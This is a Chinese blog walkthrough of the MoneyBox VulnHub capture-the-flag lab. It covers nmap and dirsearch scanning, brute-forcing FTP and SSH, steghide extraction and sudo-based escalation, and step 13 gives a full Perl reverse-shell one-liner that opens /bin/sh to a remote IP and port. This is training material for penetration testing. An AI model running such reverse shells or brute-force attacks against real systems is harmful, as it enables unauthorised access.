moneyBox靶场流程

已于 2023-10-31 09:13:12 修改
阅读量42 收藏
点赞数
文章标签: linux 运维 服务器
于 2023-10-31 09:10:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40470613/article/details/134117956
版权

一、使用工具

        1.kali

        2.nmap

        3.Yakit

        4.steghide

        5.dirsearch

        6.nc

二、打靶流程

        1.在kali中使用nmap进行端口的扫描

        2.使用dirsearch -u 目标ip 进行扫描

                1)对扫描出的目录进行访问并查看网页源码发现有提示

                2)再次访问提示的文件得到秘钥

        3.之前扫出有21端口所以对ftp服务进行暴力破解(用户:ftp,密码:123456)

        4.使用ftp远程连接靶机发现有图片猜测其存在隐写

        5.使用steghide info trytofind.jpg和steghide extract -sf trytofind.jpg获取隐写的内容

        6.爆破ssh的密码

        7.远程连接ssh

        8.查看文件看到一个user1文件打开找到第一个flag

        9.返回上一级目录发现另一个用户目录

        10.查看文件发现第二个flag文件

        11.使用SSH登录第二个用户发现能够直接登录(如果不行查看历史命令,使用其中的登录方式)

        12.查看能够执行sudo的命令:sudo -l

        13.使用perl进行提权:perl -e 'use Socket;$i="192.168.21.55";$p=9989 socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

        14.Ls -a查看隐藏文件找到flag

玖玖月
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
VulnHub靶场MONEYBOX:1
01-05
MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成各种挑战,提权、漏洞利用、代码审计等,最终获得root权限并发现flag。 在...
Moneybox
10-28
Moneybox
MONEYBOX靶场(打靶流程
qq_53733257的博客
10-27 305
money靶场打靶流程
Moneybox靶场渗透测试
qq_41567985的博客
10-30 76
steghide extract -sf trytofind.jpg 使用‘key’分离文件拿到data.txt。使用steghide info trytofind.jpg 发现图片中嵌入了一个data.txt文件。访问敏感文件/blogs,查看源码发现具有隐藏字段,猜测是另一个敏感字段,访问这个新的敏感文件。通过浏览目录发现另一个用户lily,进入lily用户,发现第二个flag user2.txt。发现隐藏文件.root.txt-打开发现第三个flag。使用find命令查找txt文件。
【VulnHub靶场】——MONEYBOX: 1
Demo不是emo的博客
09-28 3445
​ 今天的博客内容MONEYBOX: 1教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场靶场入口在这,推荐大家使用,大家进去直接搜索MONEYBOX: 1就能下载今天的靶场了,也可以找我拿,话不多说进入今天的靶场学习 ​
MoneyBox 靶场复现
hcufo的博客
07-20 126
web app 部署站点,通常有前台,应该还有后台,通过后台登录管理,爆破网站所有路径出来,再登录,尝试通过后台页面登录。通过在内网进一步渗透,掌握内网拓扑结构和权限,评估内部安全风险,指导您优化内部安全策略。打开是index.html页面,查看源码,正常 ,没有写的不严谨的地方。通过观察图片,图片上没有新提示,从直观上感觉图片正常,没有问题。Secret key?根据之前探测出系统开放22端口,ssh服务,用户renu,密码弱。我无法登录靶场,又出现无法继续渗透场景……
PYTHON实现全自动化打靶(MONEY BOX
qq_53733257的博客
11-01 156
前两天打了个靶场,hack the boxmoney box,正好最近在学python,于是想到用python来将整个打靶流程自动走一遍,只需要执行一个py文件,就能获得三个flag。
【渗透测试】第七周 vulnhub-Fawkes
铃的杂货铺分铺
11-08 994
渗透测试学习第七周,vulnhub靶场Fawkes靶机。 主机发现、端口扫描;FTP匿名登录;edb 调试程序;栈溢出攻击;tcpdump 流量分析;sudo 漏洞提权。
moneybox:钱箱应用
05-23
Moneybox OTP应用程序项目结构检索项目后 $ ./mad deps您将在树中找到以下关键应用: ├── apps/moneybox -- N2O based application快速启动引导 ./mad deps compile plan repl生产开始通常,我们使用make console...
vue实现简单实时汇率计算功能
12-29
最近在自己摸索vue的使用,因为相对于只是去看教程和实例,感觉不如自己动手写一个demo入门来的快。刚好看到小程序中有一个简单但是很精致的应用极简汇率,而且它的表现形式和vue的表现... <div class=moneyBox><span>
嵌入式Linux系统编程 — 3.4 access、chmod和 umask函数修改文件访问权限
几度春风里的博客
06-09 925
文件的权限检查不仅讨论文件本身的权限,还需要涉及到文件所在目录的权限, 只有同时都满足了,才能通过操作系统的权限检查,进而才可以对文件进行相关操作;所以,程序当中对文件进行相关操作之前,需要先检查执行进程的用户是否对该文件拥有相应的权限。需要进行权限检查的文件路径。F_OK:检查文件是否存在R_OK:检查是否拥有读权限W_OK:检查是否拥有写权限X_OK:检查是否拥有执行权限检查项通过则返回 0,表示拥有相应的权限并且文件存在;
Ollama在MacOS、Linux本地部署千问大模型及实现WEB UI访问
最新发布
派大夏的博客
06-14 511
阿里通义千问发布了Qwen2,提供了0.5B~72B的量级模型,在​​Ollama官网​​可以搜索qwen2查看,本文提供了Ollama的下载(在线/离线安装)、Ollama运行模型、使用WebUI连接模型以及页面简单配置。总体还是比较简单的,更高阶的玩法,看小伙伴的反馈,后面更新比如自定义智能体、训练等。
Linux下的动态链接和静态链接 及 调用libevent库函数的可执行文件无法正常运行情况剖析】
一起学习进步!
06-09 315
静态链接是指在编译时,将程序所依赖的函数或数据直接复制到最终的可执行文件中。这意味着可执行文件包含了程序运行所需的所有代码和数据。动态链接是指在运行时,程序所依赖的函数或数据从外部的共享库(shared library)中加载。这意味着可执行文件只包含了必要的引用信息,而实际的代码和数据则存储在外部的共享库中。
MySQl基础----Linux下搭建mysql软件及登录和基本使用(附实操图超简单一看就会)
溟洵的博客
06-10 758
本章非常基础包括如何在Linux上搭建(==当然上面的SQL语句你在其他能执行SQL语句的软件上也能正常执行,并非一定要在Linux环境下==)和mysql的基本使用
Linux_应用篇(17) FrameBuffer 应用编程
weixin_41252596的博客
06-13 533
linux FrameBuffer 应用编程
Linux命令
2301_80613136的博客
06-14 511
文件A和文件B的inode号码虽然不一样,但是文件A的内容是文件B的路径。因此,无论打开哪一个文件,最终读取的都是文件B。这意味着,文件A依赖于文件B而存在,如果删除了文件B,打开文件A就会报错:“No such file or directory”。这是软链接与硬链接最大的不同:文件A指向文件B的文件名,而不是文件B的inode号码,文件B的inode"链接数"不会因此发生变化。例:创建ceshi.txt 文件,文件内容为555,创建软连接test.txt,验证是否为创建的软连接内容。
linux中安装jdk
qq_37559701的博客
06-13 150
1.查看jdk是否安装。
Linux中的EINTR和EAGAIN错误码
weixin_62476152的博客
06-14 177
EINTR和EAGAIN是Linux系统中常见的错误码,它们反映了系统调用的状态和资源可用性。了解这两个错误码的含义和常见场景,可以帮助我们更好地进行进程间通信和同步,以及正确地处理错误和异常情况。
Linux Mint 21.3简介
地球空间
06-11 273
1. Cinnamon 6.0桌面环境:Linux Mint 21.3采用了最新的Cinnamon 6.0桌面环境,带来了新的功能和改进,例如支持Wayland会话(尽管仍处于实验性阶段)、改进的声音和电源小部件、对AVIF图像格式的新支持、屏幕缩放新手势、菜单详细信息选项、75%缩放以及窗口不透明度键绑定等。4. 应用程序更新:Linux Mint 21.3带来了应用程序的更新,包括Nemo文件管理器、Cinnamon桌面和小部件、扩展和主题等的改进。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值